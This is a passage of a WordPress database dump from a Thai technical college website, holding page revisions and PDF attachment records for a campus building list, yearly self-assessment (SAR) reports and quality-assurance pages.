อาคารช่างกลโรงงาน</span></h2>\r\n<h2><span style=\"color: #800000;\">21. อาคาร 4 ชั้น (อาคาร 13)</span></h2>\r\n<h2><span style=\"color: #800000;\">22. อาคาร 4 ชั้น (อบจ)</span></h2>\r\n<h2><span style=\"color: #800000;\">23. อาคารโรงยาง</span></h2>\r\n<h2><span style=\"color: #800000;\">24. อาคารเทคนิคพื้นฐาน</span></h2>\r\n<h2><span style=\"color: #800000;\">25. อาคารตึกส้ม</span></h2>\r\n<h2><span style=\"color: #800000;\">26. อาคารการโรงแรม</span></h2>\r\n<h2><span style=\"color: #800000;\">27. อาคารธนาคาร</span></h2>\r\n \r\n\r\n \r\n<h3><span style=\"color: #800000;\"> </span></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-06-01 11:21:31', '2018-06-01 04:21:31', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(2868, 3, '2018-06-01 11:22:59', '2018-06-01 04:22:59', '<img class=\"size-full wp-image-2815 alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-14-12.jpg\" alt=\"\" width=\"193\" height=\"56\" />\r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-2821 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-28-08.jpg\" alt=\"\" width=\"837\" height=\"287\" />\r\n\r\n<img class=\"wp-image-2817 size-full alignleft\" src=\"/wp-content/uploads/2018/05/30-5-2561-14-21-41.jpg\" alt=\"\" width=\"815\" height=\"261\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2018/06/555555.jpg\"><img class=\"alignleft wp-image-2866\" src=\"/wp-content/uploads/2018/06/555555.jpg\" alt=\"\" width=\"2000\" height=\"967\" /></a>\r\n\r\n<img class=\"wp-image-2824 size-full alignleft\" src=\"/wp-content/uploads/2018/05/42566265256526.jpg\" alt=\"\" width=\"540\" height=\"44\" />\r\n\r\n \r\n\r\n \r\n<h2><span style=\"color: #ffffff;\">1. อาคารโรงยิม</span></h2>\r\n<h2></h2>\r\n<h2><span style=\"color: #800000;\">1. อาคารโรงยิม</span></h2>\r\n<h2><span style=\"color: #800000;\">2. อาคารคหกรรม</span></h2>\r\n<h2><span style=\"color: #800000;\">3. อาคารการท่องเที่ยว</span></h2>\r\n<h2><span style=\"color: #800000;\">4. อาคารสารสนเทศ</span></h2>\r\n<h2><span style=\"color: #800000;\">5. อาคารช่างเชื่อมเก่า</span></h2>\r\n<h2><span style=\"color: #800000;\">6. อาคารอิเล็กทรอนิกส์</span></h2>\r\n<h2><span style=\"color: #800000;\">7. อาคารบริหารธุรกิจ</span></h2>\r\n<h2><span style=\"color: #800000;\">8. อาคารปิโตรเคมี</span></h2>\r\n<h2><span style=\"color: #800000;\">9. อาคารโรงอาหาร</span></h2>\r\n<h2><span style=\"color: #800000;\">10. อาคารเรียนเขียนแบบ 2 ชั้น</span></h2>\r\n<h2><span style=\"color: #800000;\">11. อาคารช่างก่อสร้าง</span></h2>\r\n<h2><span style=\"color: #800000;\">12. อาคารตึกอำนวยการ</span></h2>\r\n<h2><span style=\"color: #800000;\">13. อาคาร AUA</span></h2>\r\n<h2><span style=\"color: #800000;\">14. อาคารพัสดุ</span></h2>\r\n<h2><span style=\"color: #800000;\">15. อาคารเขียนแบบเทคนิคพื้นฐาน</span></h2>\r\n<h2><span style=\"color: #800000;\">16. อาคารเรียนสามัญ</span></h2>\r\n<h2><span style=\"color: #800000;\">17. อาคารไฟฟ้ากำลัง</span></h2>\r\n<h2><span style=\"color: #800000;\">18. อาคารเทคโนโลยีอุตสาหกรรม</span></h2>\r\n<h2><span style=\"color: #800000;\">19. อาคารช่างยนต์</span></h2>\r\n<h2><span style=\"color: #800000;\">20. อาคารช่างกลโรงงาน</span></h2>\r\n<h2><span style=\"color: #800000;\">21. อาคาร 4 ชั้น (อาคาร 13)</span></h2>\r\n<h2><span style=\"color: #800000;\">22. อาคาร 4 ชั้น (อบจ)</span></h2>\r\n<h2><span style=\"color: #800000;\">23. อาคารโรงยาง</span></h2>\r\n<h2><span style=\"color: #800000;\">24. อาคารเทคนิคพื้นฐาน</span></h2>\r\n<h2><span style=\"color: #800000;\">25. อาคารตึกส้ม</span></h2>\r\n<h2><span style=\"color: #800000;\">26. อาคารการโรงแรม</span></h2>\r\n<h2><span style=\"color: #800000;\">27. อาคารธนาคาร</span></h2>\r\n \r\n\r\n \r\n<h3><span style=\"color: #800000;\"> </span></h3>\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '2809-revision-v1', '', '', '2018-06-01 11:22:59', '2018-06-01 04:22:59', '', 2809, 'http://www.technicrayong.ac.th/2809-revision-v1/', 0, 'revision', '', 0),
(2870, 3, '2018-06-01 13:10:21', '2018-06-01 06:10:21', '<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />\r\n<h3><span style=\"color: #0000ff;\">รายงานการประเมินตนเอง (SAR) </span></h3>\r\n ', 'งานประกันคุณภาพและมาตรฐานการศึกษา', '', 'inherit', 'closed', 'closed', '', '1753-revision-v1', '', '', '2018-06-01 13:10:21', '2018-06-01 06:10:21', '', 1753, 'http://www.technicrayong.ac.th/1753-revision-v1/', 0, 'revision', '', 0),
(2871, 3, '2018-06-01 13:21:51', '2018-06-01 06:21:51', '<h3><a href=\"/%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%95%e0%b8%99%e0%b9%80%e0%b8%ad%e0%b8%87-sar-%e0%b8%9b%e0%b8%b5%e0%b8%81-3/\"><span style=\"color: #0000ff;\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2563 </span></a></h3>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"/%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%95%e0%b8%99%e0%b9%80%e0%b8%ad%e0%b8%87-sar-%e0%b8%9b%e0%b8%b5%e0%b8%81/\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2562 </a></span></h3>\r\n<h3><a href=\"/wp-content/uploads/2019/06/รายงานการประเมินตนเอง-ปีการศึกษา-2561__14.39.pdf\"><span style=\"color: #0000ff;\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2561 </span></a></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/09/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2560-1.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2560</a></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2559.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2559</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2558.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2558</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2557.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2557</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2556.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2556</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2555.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2555</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2554.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2554</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2553.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2553</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2552.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2552</a></span></h3>', 'รายงานการประเมินตนเอง (SAR)', '', 'publish', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%95%e0%b8%99%e0%b9%80%e0%b8%ad%e0%b8%87-sar', '', '', '2021-08-23 14:25:33', '2021-08-23 07:25:33', '', 0, 'http://www.technicrayong.ac.th/?page_id=2871', 0, 'page', '', 0),
(2872, 3, '2018-06-01 13:17:53', '2018-06-01 06:17:53', '', 'รายงานประเมินตนเอง (SAR) ปีการศึกษา 2552', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%95%e0%b8%99%e0%b9%80%e0%b8%ad%e0%b8%87-sar-%e0%b8%9b%e0%b8%b5%e0%b8%81', '', '', '2018-06-01 13:17:53', '2018-06-01 06:17:53', '', 2871, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2552.pdf', 0, 'attachment', 'application/pdf', 0),
(2873, 3, '2018-06-01 13:18:09', '2018-06-01 06:18:09', '', 'รายงานประเมินตนเอง (SAR) ปีการศึกษา 2553', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%95%e0%b8%99%e0%b9%80%e0%b8%ad%e0%b8%87-sar-%e0%b8%9b%e0%b8%b5%e0%b8%81-2', '', '', '2018-06-01 13:18:09', '2018-06-01 06:18:09', '', 2871, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2553.pdf', 0, 'attachment', 'application/pdf', 0),
(2874, 3, '2018-06-01 13:18:31', '2018-06-01 06:18:31', '', 'รายงานประเมินตนเอง (SAR) ปีการศึกษา 2554', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%95%e0%b8%99%e0%b9%80%e0%b8%ad%e0%b8%87-sar-%e0%b8%9b%e0%b8%b5%e0%b8%81-3', '', '', '2018-06-01 13:18:31', '2018-06-01 06:18:31', '', 2871, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2554.pdf', 0, 'attachment', 'application/pdf', 0),
(2875, 3, '2018-06-01 13:18:41', '2018-06-01 06:18:41', '', 'รายงานประเมินตนเอง (SAR) ปีการศึกษา 2555', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%95%e0%b8%99%e0%b9%80%e0%b8%ad%e0%b8%87-sar-%e0%b8%9b%e0%b8%b5%e0%b8%81-4', '', '', '2018-06-01 13:18:41', '2018-06-01 06:18:41', '', 2871, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2555.pdf', 0, 'attachment', 'application/pdf', 0),
(2876, 3, '2018-06-01 13:18:50', '2018-06-01 06:18:50', '', 'รายงานประเมินตนเอง (SAR) ปีการศึกษา 2556', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%95%e0%b8%99%e0%b9%80%e0%b8%ad%e0%b8%87-sar-%e0%b8%9b%e0%b8%b5%e0%b8%81-5', '', '', '2018-06-01 13:18:50', '2018-06-01 06:18:50', '', 2871, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2556.pdf', 0, 'attachment', 'application/pdf', 0),
(2877, 3, '2018-06-01 13:19:03', '2018-06-01 06:19:03', '', 'รายงานประเมินตนเอง (SAR) ปีการศึกษา 2557', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%95%e0%b8%99%e0%b9%80%e0%b8%ad%e0%b8%87-sar-%e0%b8%9b%e0%b8%b5%e0%b8%81-6', '', '', '2018-06-01 13:19:03', '2018-06-01 06:19:03', '', 2871, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2557.pdf', 0, 'attachment', 'application/pdf', 0),
(2878, 3, '2018-06-01 13:19:24', '2018-06-01 06:19:24', '', 'รายงานประเมินตนเอง (SAR) ปีการศึกษา 2558', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%95%e0%b8%99%e0%b9%80%e0%b8%ad%e0%b8%87-sar-%e0%b8%9b%e0%b8%b5%e0%b8%81-7', '', '', '2018-06-01 13:19:24', '2018-06-01 06:19:24', '', 2871, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2558.pdf', 0, 'attachment', 'application/pdf', 0),
(2879, 3, '2018-06-01 13:19:34', '2018-06-01 06:19:34', '', 'รายงานประเมินตนเอง (SAR) ปีการศึกษา 2559', '', 'inherit', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%95%e0%b8%99%e0%b9%80%e0%b8%ad%e0%b8%87-sar-%e0%b8%9b%e0%b8%b5%e0%b8%81-8', '', '', '2018-06-01 13:19:34', '2018-06-01 06:19:34', '', 2871, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2559.pdf', 0, 'attachment', 'application/pdf', 0),
(2880, 3, '2018-06-01 13:21:51', '2018-06-01 06:21:51', '<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2559.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2559</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2558.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2558</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2557.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2557</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2556.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2556</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2555.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2555</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2554.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2554</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2553.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2553</a> </span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/รายงานประเมินตนเอง-SAR-ปีการศึกษา-2552.pdf\">รายงานประเมินตนเอง (SAR) ปีการศึกษา 2552</a></span></h3>', 'รายงานการประเมินตนเอง (SAR)', '', 'inherit', 'closed', 'closed', '', '2871-revision-v1', '', '', '2018-06-01 13:21:51', '2018-06-01 06:21:51', '', 2871, 'http://www.technicrayong.ac.th/2871-revision-v1/', 0, 'revision', '', 0),
(2882, 3, '2018-06-01 13:22:26', '2018-06-01 06:22:26', '<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.technicrayong.ac.th/รายงานการประเมินตนเอง-sar\">รายงานการประเมินตนเอง (SAR)</a> </span></h3>\r\n ', 'งานประกันคุณภาพและมาตรฐานการศึกษา', '', 'inherit', 'closed', 'closed', '', '1753-revision-v1', '', '', '2018-06-01 13:22:26', '2018-06-01 06:22:26', '', 1753, 'http://www.technicrayong.ac.th/1753-revision-v1/', 0, 'revision', '', 0),
(2883, 3, '2018-06-01 14:39:11', '2018-06-01 07:39:11', '<a href=\"/%e0%b9%80%e0%b8%84%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%84%e0%b8%a7%e0%b8%9a%e0%b8%84%e0%b8%b8%e0%b8%a1/1-21/\"><img class=\"alignnone size-full wp-image-11935\" src=\"/wp-content/uploads/2021/07/1-1.png\" alt=\"\" width=\"3508\" height=\"2480\" /></a>', 'เครื่องมือวัดและควบคุม', '', 'publish', 'closed', 'closed', '', '%e0%b9%80%e0%b8%84%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b8%84%e0%b8%a7%e0%b8%9a%e0%b8%84%e0%b8%b8%e0%b8%a1', '', '', '2021-07-06 09:11:17', '2021-07-06 02:11:17', '', 0, 'http://www.technicrayong.ac.th/?page_id=2883', 0, 'page', '', 0),
(2884, 3, '2018-06-01 13:31:09', '2018-06-01 06:31:09', '', 'คู่มือการประเมินสถานศึกษาอาชีวศึกษาพระราชทาน', '', 'inherit', 'closed', 'closed', '', '%e0%b8%84%e0%b8%b9%e0%b9%88%e0%b8%a1%e0%b8%b7%e0%b8%ad%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%a8%e0%b8%b6', '', '', '2018-06-01 13:31:09', '2018-06-01 06:31:09', '', 1753, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/คู่มือการประเมินสถานศึกษาอาชีวศึกษาพระราชทาน.pdf', 0, 'attachment', 'application/pdf', 0),
(2885, 3, '2018-06-01 13:34:13', '2018-06-01 06:34:13', '', 'RTC Logo', '', 'inherit', 'closed', 'closed', '', 'rtc-logo', '', '', '2018-06-01 13:34:13', '2018-06-01 06:34:13', '', 1753, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/RTC-Logo.jpg', 0, 'attachment', 'image/jpeg', 0),
(2886, 3, '2018-06-01 13:35:25', '2018-06-01 06:35:25', '<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />\r\n<h3><a href=\"https://drive.google.com/file/d/0B7ghyAKLnNIXSWRFUVVoQUZJSFk/view\"><span style=\"color: #0000ff;\">โลโก้วิทยาลัยฯ</span></a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/คู่มือการประเมินสถานศึกษาอาชีวศึกษาพระราชทาน.pdf\">คู่มือการประเมินสถานศึกษาอาชีวศึกษา เพื่อรับรางวัลพระราชทาน</a></h3>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"/รายงานการประเมินตนเอง-sar\">รายงานการประเมินตนเอง (SAR)</a> </span></h3>\r\n \r\n\r\n ', 'งานประกันคุณภาพและมาตรฐานการศึกษา', '', 'inherit', 'closed', 'closed', '', '1753-revision-v1', '', '', '2018-06-01 13:35:25', '2018-06-01 06:35:25', '', 1753, 'http://www.technicrayong.ac.th/1753-revision-v1/', 0, 'revision', '', 0),
(2887, 3, '2018-06-01 13:43:36', '2018-06-01 06:43:36', '<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />\r\n<h3><a href=\"https://drive.google.com/file/d/0B7ghyAKLnNIXSWRFUVVoQUZJSFk/view\"><span style=\"color: #0000ff;\">โลโก้วิทยาลัยฯ</span></a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/คู่มือการประเมินสถานศึกษาอาชีวศึกษาพระราชทาน.pdf\">คู่มือการประเมินสถานศึกษาอาชีวศึกษา เพื่อรับรางวัลพระราชทาน</a></h3>\r\n<h3><strong><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/%E0%B8%84%E0%B8%A7%E0%B8%B2%E0%B8%A1%E0%B8%AA%E0%B8%B3%E0%B8%84%E0%B8%B1%E0%B8%8D%E0%B8%82%E0%B8%AD%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B9%80%E0%B8%A1%E0%B8%B4%E0%B8%99%E0%B8%84%E0%B8%B8%E0%B8%93%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%AA%E0%B8%96%E0%B8%B2%E0%B8%99%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2%E0%B9%82%E0%B8%94%E0%B8%A2%E0%B8%95%E0%B9%89%E0%B8%99%20%E0%B8%9C%E0%B8%AD_%E0%B8%AA%E0%B8%B4%E0%B8%A3%E0%B8%B4%E0%B8%A3%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B9%8C.ppt\">ความรู้ด้านการประกันคุณภาพ</a></strong></h3>\r\n<h3><strong><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/%E0%B8%9D%E0%B9%88%E0%B8%B2%E0%B8%A2%E0%B8%A7%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%20%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B1%E0%B8%99%E0%B8%84%E0%B8%B8%E0%B8%93%E0%B8%A0%E0%B8%B2%E0%B8%9E/%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B9%83%E0%B8%8A%E0%B9%89%E0%B9%80%E0%B8%81%E0%B9%87%E0%B8%9A%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5/%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD.zip\">แบบฟอร์มเครื่องมือที่ใช้เก็บรวบรวมข้อมูล</a></strong></h3>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"/รายงานการประเมินตนเอง-sar\">รายงานการประเมินตนเอง (SAR)</a> </span></h3>\r\n<h3><a href=\"http://www.technicrayong.ac.th/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9-2/\"><span style=\"color: #0000ff;\"><strong>ข้อมูลนักเรียน นักศึกษา</strong></span></a></h3>\r\n \r\n\r\n ', 'งานประกันคุณภาพและมาตรฐานการศึกษา', '', 'inherit', 'closed', 'closed', '', '1753-revision-v1', '', '', '2018-06-01 13:43:36', '2018-06-01 06:43:36', '', 1753, 'http://www.technicrayong.ac.th/1753-revision-v1/', 0, 'revision', '', 0),
(2888, 3, '2018-06-01 13:44:40', '2018-06-01 06:44:40', '<img class=\"aligncenter size-full wp-image-1619\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" alt=\"\" width=\"193\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1496 \" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" />\r\n\r\n<img class=\"aligncenter wp-image-1620 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-50-20.jpg\" alt=\"\" width=\"743\" height=\"630\" />\r\n<h3><span style=\"color: #993300;\">** ข้อมูลนักเรียน นักศึกษา </span> <a href=\"/ข้อมูลนักเรียนนักศึกษา60\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\r\n ', 'งานทะเบียน', '', 'inherit', 'closed', 'closed', '', '1576-revision-v1', '', '', '2018-06-01 13:44:40', '2018-06-01 06:44:40', '', 1576, 'http://www.technicrayong.ac.th/1576-revision-v1/', 0, 'revision', '', 0),
